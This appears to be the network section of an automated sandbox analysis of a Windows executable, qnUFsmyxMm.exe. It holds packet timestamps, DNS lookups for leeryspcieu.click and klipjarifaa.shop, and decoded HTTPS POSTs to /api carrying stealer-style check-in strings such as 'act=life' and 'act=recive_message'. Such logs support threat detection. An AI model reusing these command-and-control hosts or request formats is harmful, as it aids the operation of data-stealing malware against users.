Jan 1, 2025 16:54:14.746212959 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.746228933 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.746318102 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.746326923 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.746382952 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.763417959 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.763441086 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.763474941 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.763488054 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.763504028 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.763546944 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.763679981 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.763698101 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.763739109 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.763746023 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.763757944 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.763786077 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.763791084 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.763811111 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.763816118 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.763843060 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.763869047 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.764010906 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.764024973 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.764062881 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.764069080 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.764096022 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.764102936 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.765569925 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.765590906 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.765624046 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.765634060 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.765654087 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.765685081 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.765773058 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.765788078 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.765834093 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.765842915 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.765887022 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.768471956 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.832478046 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.832518101 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.832611084 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.832624912 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.832676888 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.834829092 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.834846973 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.834917068 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.834924936 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.852029085 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.852054119 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.852159977 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.852174044 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.852264881 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.852279902 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.852329969 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.852340937 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.852371931 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.852421999 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.852430105 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.852469921 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.852590084 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.852607012 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.852654934 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.852663040 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.852715015 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.854202986 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.854219913 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.854276896 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.854285002 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.854326963 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.854437113 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.854451895 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.854509115 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.854516029 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.854547977 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.857973099 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.980139017 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.980161905 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.980246067 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.980259895 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.980308056 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.980873108 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.980889082 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.980947018 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.980953932 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.980998993 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.985434055 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.985450029 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.985533953 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.985542059 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.985598087 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.985641003 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.985657930 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.985709906 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.985717058 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.985779047 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.985893011 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.985909939 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.985951900 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.985960007 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.985997915 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.986310959 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.986326933 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.986377954 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.986383915 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.986393929 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.986413002 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.986433029 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.986439943 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.986464977 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.986481905 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.986666918 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.986681938 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.986726046 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.986732960 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:14.986774921 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:14.991074085 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.068851948 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.068875074 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.068964005 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.068977118 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.069022894 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.069405079 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.069420099 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.069469929 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.069477081 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.069505930 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.069518089 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.074434996 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.074453115 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.074512005 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.074520111 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.074563026 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.077105045 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.077122927 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.077184916 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.077191114 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.077231884 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.077301979 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.077322006 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.077364922 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.077374935 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.077414036 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.077430964 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.077446938 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.077483892 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.077491045 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.077514887 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.077524900 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.077630997 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.077655077 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.077683926 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.077688932 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.077721119 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.077729940 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.077799082 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.077814102 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.077864885 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.077872038 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.077914000 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.079798937 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.157455921 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.157474995 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.157576084 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.157584906 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.157634020 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.158029079 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.158042908 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.158091068 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.158099890 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.158128977 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.158147097 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.162683010 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.162698030 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.162769079 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.162775993 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.162832975 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.163223982 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.163239956 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.163279057 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.163285017 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.163295031 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.163310051 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.163322926 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.163355112 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.163361073 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.163381100 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.163409948 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.163755894 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.163769960 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.163826942 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.163834095 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.163875103 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.163877010 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.163886070 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.163904905 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.163925886 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.163932085 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.163944960 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.164058924 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.164072990 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.164103985 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.164112091 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.164120913 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.164155960 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.168477058 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.246181011 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.246200085 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.246284008 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.246292114 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.246332884 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.246704102 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.246733904 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.246764898 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.246771097 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.246803045 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.246810913 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.251257896 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.251272917 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.251326084 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.251333952 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.251373053 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.251672983 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.251688957 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.251734018 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.251744032 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.251781940 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.251916885 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.251931906 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.251980066 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.251987934 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.252029896 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.252283096 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.252298117 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.252352953 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.252358913 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.252408028 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.252631903 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.252646923 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.252727032 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.252733946 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.252849102 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.252933025 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.252948999 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.253145933 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.253153086 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.253191948 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.257837057 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.334714890 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.334752083 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.334779024 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.334789038 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.334820032 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.334832907 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.334913969 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.337686062 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.337704897 CET	443	49983	188.114.97.3	192.168.2.5
Jan 1, 2025 16:54:15.337713003 CET	49983	443	192.168.2.5	188.114.97.3
Jan 1, 2025 16:54:15.337718964 CET	443	49983	188.114.97.3	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 1, 2025 16:53:56.556869984 CET	51925	53	192.168.2.5	1.1.1.1
Jan 1, 2025 16:53:56.570777893 CET	53	51925	1.1.1.1	192.168.2.5
Jan 1, 2025 16:54:08.215223074 CET	49526	53	192.168.2.5	1.1.1.1
Jan 1, 2025 16:54:08.229155064 CET	53	49526	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 1, 2025 16:53:56.556869984 CET	192.168.2.5	1.1.1.1	0x9cad	Standard query (0)	leeryspcieu.click	A (IP address)	IN (0x0001)	false
Jan 1, 2025 16:54:08.215223074 CET	192.168.2.5	1.1.1.1	0xcdc	Standard query (0)	klipjarifaa.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 1, 2025 16:53:56.570777893 CET	1.1.1.1	192.168.2.5	0x9cad	No error (0)	leeryspcieu.click	172.67.219.133	A (IP address)	IN (0x0001)	false
Jan 1, 2025 16:53:56.570777893 CET	1.1.1.1	192.168.2.5	0x9cad	No error (0)	leeryspcieu.click	104.21.45.223	A (IP address)	IN (0x0001)	false
Jan 1, 2025 16:54:08.229155064 CET	1.1.1.1	192.168.2.5	0xcdc	No error (0)	klipjarifaa.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Jan 1, 2025 16:54:08.229155064 CET	1.1.1.1	192.168.2.5	0xcdc	No error (0)	klipjarifaa.shop	188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

leeryspcieu.click

klipjarifaa.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49975	172.67.219.133	443	6464	C:\Users\user\Desktop\qnUFsmyxMm.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 15:53:57 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: leeryspcieu.click
2025-01-01 15:53:57 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-01 15:53:57 UTC	1129	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 15:53:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hm3vnv3r1nqhhqusjmtd84q87n; expires=Sun, 27 Apr 2025 09:40:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wuA99IvtVhqk8OmR1qvAVLXkYMf2IaK8mNU0QCPgxRdD70ifjOtb%2BBXSOaCWvdHG73466mcOrEzY8%2FY79vv2rSn42Cw%2BYf0dN80eLVohAYlH2uby7B59IvLCug8k1YaGtIslqA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb3af6459477c88-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1889&min_rtt=1881&rtt_var=723&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=908&delivery_rate=1496668&cwnd=219&unsent_bytes=0&cid=c2d6971277f3cbf7&ts=507&x=0"
2025-01-01 15:53:57 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-01 15:53:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49976	172.67.219.133	443	6464	C:\Users\user\Desktop\qnUFsmyxMm.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 15:53:58 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 48 Host: leeryspcieu.click
2025-01-01 15:53:58 UTC	48	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 63 32 43 6f 57 30 2d 2d 76 69 6b 69 2d 31 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=c2CoW0--viki-1&j=
2025-01-01 15:53:58 UTC	1127	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 15:53:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=j0juuteo1pur78cgv2qm9vji8g; expires=Sun, 27 Apr 2025 09:40:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6fd6zsXcOLLKEVRVd8VOmjYcwJ%2FA3mjJIAs3Lbk7ZkLxHgp3JQi2XXKEd449PGPRc2T%2BzCjiLY5HIHL6Chlidai943b74P3QcFeggCvRZrl76dAvsdYvRqaNLvTTAmXThNc2Ow%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb3af6a6bbb42d7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1543&min_rtt=1534&rtt_var=594&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=949&delivery_rate=1813664&cwnd=245&unsent_bytes=0&cid=faca40b7c568e45e&ts=496&x=0"
